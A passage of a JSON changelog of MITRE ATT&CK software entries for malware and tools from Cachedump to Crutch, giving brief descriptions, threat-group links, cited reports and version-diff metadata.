"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:10.197000+00:00", + "modified": "2025-04-25 14:45:28.653000+00:00", + "name": "Cachedump", + "description": "[Cachedump](https://attack.mitre.org/software/S0119) is a publicly-available tool that program extracts cached password hashes from a system\u2019s registry. (Citation: Mandiant APT1)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0119", + "external_id": "S0119" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cachedump" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:28.653000+00:00\", \"old_value\": \"2025-04-16 20:38:56.154000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a705b085-1eae-455e-8f4d-842483d814eb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-22 20:07:15.628000+00:00", + "modified": "2025-04-25 14:44:19.544000+00:00", + "name": "Cadelspy", + "description": "[Cadelspy](https://attack.mitre.org/software/S0454) is a backdoor that has been used by [APT39](https://attack.mitre.org/groups/G0087).(Citation: Symantec Chafer Dec 2015)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0454", + "external_id": "S0454" + }, + { + "source_name": "Symantec Chafer Dec 2015", + "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.", + "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cadelspy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:19.544000+00:00\", \"old_value\": \"2025-04-16 20:38:29.046000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--cb7bcf6f-085f-41db-81ee-4b68481661b5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:52.875000+00:00", + "modified": "2025-04-25 14:44:42.237000+00:00", + "name": "CallMe", + "description": "[CallMe](https://attack.mitre.org/software/S0077) is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. (Citation: Scarlet Mimic Jan 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0077", + "external_id": "S0077" + }, + { + "source_name": "Scarlet Mimic Jan 2016", + "description": "Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CallMe" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:42.237000+00:00\", \"old_value\": \"2025-04-16 20:38:35.526000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--d20b397a-ea47-48a9-b503-2e2a3551e11d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-30 18:58:03.614000+00:00", + "modified": "2025-04-25 14:44:46.016000+00:00", + "name": "Cannon", + "description": "[Cannon](https://attack.mitre.org/software/S0351) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. (Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0351", + "external_id": "S0351" + }, + { + "source_name": "Cannon", + "description": "(Citation: Unit42 Cannon Nov 2018)" + }, + { + "source_name": "Unit42 Cannon Nov 2018", + "description": "Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New \u2018Cannon\u2019 Trojan. Retrieved November 26, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" + }, + { + "source_name": "Unit42 Sofacy Dec 2018", + "description": "Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group\u2019s Global Campaign. Retrieved April 19, 2019.", + "url": "https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cannon" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:46.016000+00:00\", \"old_value\": \"2025-04-16 20:38:36.652000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--b7e9880a-7a7c-4162-bddb-e28e8ef2bf1f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-29 19:36:02.103000+00:00", + "modified": "2025-04-25 14:44:30.048000+00:00", + "name": "Carbon", + "description": "[Carbon](https://attack.mitre.org/software/S0335) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. [Carbon](https://attack.mitre.org/software/S0335) has been selectively used by [Turla](https://attack.mitre.org/groups/G0010) to target government and foreign affairs-related organizations in Central Asia.(Citation: ESET Carbon Mar 2017)(Citation: Securelist Turla Oct 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0335", + "external_id": "S0335" + }, + { + "source_name": "Carbon", + "description": "(Citation: ESET Carbon Mar 2017)(Citation: Securelist Turla Oct 2018)" + }, + { + "source_name": "ESET Carbon Mar 2017", + "description": "ESET. (2017, March 30). Carbon Paper: Peering into Turla\u2019s second stage backdoor. Retrieved November 7, 2018.", + "url": "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/" + }, + { + "source_name": "Securelist Turla Oct 2018", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 04). Shedding Skin \u2013 Turla\u2019s Fresh Faces. Retrieved November 7, 2018.", + "url": "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Carbon" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:30.048000+00:00\", \"old_value\": \"2025-04-16 20:38:31.987000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--751b77e6-af1f-483b-93fe-eddf17f92a64", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-02-10 18:20:51.309000+00:00", + "modified": "2025-04-25 14:43:46.592000+00:00", + "name": "Caterpillar WebShell", + "description": "[Caterpillar WebShell](https://attack.mitre.org/software/S0572) is a self-developed Web Shell tool created by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123).(Citation: ClearSky Lebanese Cedar Jan 2021) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0572", + "external_id": "S0572" + }, + { + "source_name": "Caterpillar WebShell", + "description": "(Citation: ClearSky Lebanese Cedar Jan 2021)(Citation: CheckPoint Volatile Cedar March 2015)" + }, + { + "source_name": "ClearSky Lebanese Cedar Jan 2021", + "description": "ClearSky Cyber Security. (2021, January). \u201cLebanese Cedar\u201d APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021.", + "url": "https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf" + }, + { + "source_name": "CheckPoint Volatile Cedar March 2015", + "description": "Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Caterpillar WebShell" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:46.592000+00:00\", \"old_value\": \"2025-04-16 20:38:17.640000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--5bcd5511-6756-4824-a692-e8bb109364af", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:43:29.227000+00:00", + "name": "Chaos", + "description": "[Chaos](https://attack.mitre.org/software/S0220) is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. (Citation: Chaos Stolen Backdoor)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0220", + "external_id": "S0220" + }, + { + "source_name": "Chaos", + "description": "(Citation: Chaos Stolen Backdoor)" + }, + { + "source_name": "Chaos Stolen Backdoor", + "description": "Sebastian Feldmann. (2018, February 14). Chaos: a Stolen Backdoor Rising Again. Retrieved March 5, 2018.", + "url": "http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Chaos" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:29.227000+00:00\", \"old_value\": \"2025-04-16 20:38:11.037000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--7acb15b6-fe2c-4319-b136-6ab36ff0b2d4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2022-01-24 16:56:36.108000+00:00", + "modified": "2025-04-25 14:43:49.304000+00:00", + "name": "CharmPower", + "description": "[CharmPower](https://attack.mitre.org/software/S0674) is a PowerShell-based, modular backdoor that has been used by [Magic Hound](https://attack.mitre.org/groups/G0059) since at least 2022.(Citation: Check Point APT35 CharmPower January 2022)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0674", + "external_id": "S0674" + }, + { + "source_name": "Check Point APT35 CharmPower January 2022", + "description": "Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.", + "url": "https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CharmPower" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:49.304000+00:00\", \"old_value\": \"2025-04-16 20:38:18.570000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--b2203c59-4089-4ee4-bfe1-28fa25f0dbfe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:05.710000+00:00", + "modified": "2025-04-25 14:44:26.291000+00:00", + "name": "Cherry Picker", + "description": "[Cherry Picker](https://attack.mitre.org/software/S0107) is a point of sale (PoS) memory scraper. (Citation: Trustwave Cherry Picker)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0107", + "external_id": "S0107" + }, + { + "source_name": "Trustwave Cherry Picker", + "description": "Merritt, E.. (2015, November 16). Shining the Spotlight on Cherry Picker PoS Malware. Retrieved April 20, 2016.", + "url": "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cherry Picker" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:26.291000+00:00\", \"old_value\": \"2025-04-16 20:38:30.864000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--6e95feb1-78ee-48d3-b421-4d76663b5c49", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-11-12 20:54:55.974000+00:00", + "modified": "2025-04-25 14:43:43.008000+00:00", + "name": "Clambling", + "description": "[Clambling](https://attack.mitre.org/software/S0660) is a modular backdoor written in C++ that has been used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2017.(Citation: Trend Micro DRBControl February 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0660", + "external_id": "S0660" + }, + { + "source_name": "Trend Micro DRBControl February 2020", + "description": "Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Clambling" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:43.008000+00:00\", \"old_value\": \"2025-04-16 20:38:16.175000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--cad3ba95-8c89-4146-ab10-08daa813f9de", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-05-10 23:19:38.608000+00:00", + "modified": "2025-04-25 14:44:41.142000+00:00", + "name": "Clop", + "description": "[Clop](https://attack.mitre.org/software/S0611) is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. [Clop](https://attack.mitre.org/software/S0611) is a variant of the CryptoMix ransomware.(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)(Citation: Unit42 Clop April 2021) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0611", + "external_id": "S0611" + }, + { + "source_name": "Clop", + "description": "(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)" + }, + { + "source_name": "Mcafee Clop Aug 2019", + "description": "Mundo, A. (2019, August 1). Clop Ransomware. Retrieved May 10, 2021.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/" + }, + { + "source_name": "Cybereason Clop Dec 2020", + "description": "Cybereason Nocturnus. (2020, December 23). Cybereason vs. Clop Ransomware. Retrieved May 11, 2021.", + "url": "https://www.cybereason.com/blog/cybereason-vs.-clop-ransomware" + }, + { + "source_name": "Unit42 Clop April 2021", + "description": "Santos, D. (2021, April 13). Threat Assessment: Clop Ransomware. Retrieved July 30, 2021.", + "url": "https://unit42.paloaltonetworks.com/clop-ransomware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Clop" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:41.142000+00:00\", \"old_value\": \"2025-04-16 20:38:35.205000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--cbf646f1-7db5-4dc6-808b-0094313949df", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:38.128000+00:00", + "modified": "2025-04-25 14:44:42.958000+00:00", + "name": "CloudDuke", + "description": "[CloudDuke](https://attack.mitre.org/software/S0054) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: F-Secure The Dukes) (Citation: Securelist Minidionis July 2015)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0054", + "external_id": "S0054" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + }, + { + "source_name": "Securelist Minidionis July 2015", + "description": "Lozhkin, S.. (2015, July 16). Minidionis \u2013 one more APT with a usage of cloud drives. Retrieved April 5, 2017.", + "url": "https://securelist.com/minidionis-one-more-apt-with-a-usage-of-cloud-drives/71443/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CloudDuke", + "MiniDionis", + "CloudLook" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:42.958000+00:00\", \"old_value\": \"2025-04-16 20:38:35.863000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--aa1462a1-d065-416c-b354-bedd04998c7f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-29 21:40:37.350000+00:00", + "modified": "2025-04-25 14:44:21.097000+00:00", + "name": "Cobian RAT", + "description": "[Cobian RAT](https://attack.mitre.org/software/S0338) is a backdoor, remote access tool that has been observed since 2016.(Citation: Zscaler Cobian Aug 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0338", + "external_id": "S0338" + }, + { + "source_name": "Cobian RAT", + "description": "(Citation: Zscaler Cobain Aug 2017)" + }, + { + "source_name": "Zscaler Cobian Aug 2017", + "description": "Yadav, A., et al. (2017, August 31). Cobian RAT \u2013 A backdoored RAT. Retrieved November 13, 2018.", + "url": "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cobian RAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:21.097000+00:00\", \"old_value\": \"2025-04-16 20:38:29.365000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--d1531eaa-9e17-473e-a680-3298469662c3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-04-23 18:41:36.914000+00:00", + "modified": "2025-04-25 14:44:45.121000+00:00", + "name": "CoinTicker", + "description": "[CoinTicker](https://attack.mitre.org/software/S0369) is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.(Citation: CoinTicker 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0369", + "external_id": "S0369" + }, + { + "source_name": "CoinTicker 2019", + "description": "Thomas Reed. (2018, October 29). Mac cryptocurrency ticker app installs backdoors. Retrieved April 23, 2019.", + "url": "https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CoinTicker" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Richie Cyrus, SpecterOps" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:45.121000+00:00\", \"old_value\": \"2025-04-16 20:38:36.473000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:45:04.669000+00:00", + "name": "Comnie", + "description": "[Comnie](https://attack.mitre.org/software/S0244) is a remote backdoor which has been used in attacks in East Asia. (Citation: Palo Alto Comnie)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0244", + "external_id": "S0244" + }, + { + "source_name": "Comnie", + "description": "(Citation: Palo Alto Comnie)" + }, + { + "source_name": "Palo Alto Comnie", + "description": "Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Comnie" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:04.669000+00:00\", \"old_value\": \"2025-04-16 20:38:43.241000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--2eb9b131-d333-4a48-9eb4-d8dec46c19ee", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:36.550000+00:00", + "modified": "2025-04-25 14:42:57.253000+00:00", + "name": "CosmicDuke", + "description": "[CosmicDuke](https://attack.mitre.org/software/S0050) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. (Citation: F-Secure The Dukes)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0050", + "external_id": "S0050" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CosmicDuke", + "TinyBaron", + "BotgenStudios", + "NemesisGemina" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:57.253000+00:00\", \"old_value\": \"2025-04-16 20:38:00.812000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--925a6c52-5cf0-4fec-99de-b0d6917d8593", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-04 20:43:50.481000+00:00", + "modified": "2025-04-25 14:44:04.068000+00:00", + "name": "Crutch", + "description": "[Crutch](https://attack.mitre.org/software/S0538) is a backdoor designed for document theft that has been used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2015.(Citation: ESET Crutch December 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0538", + 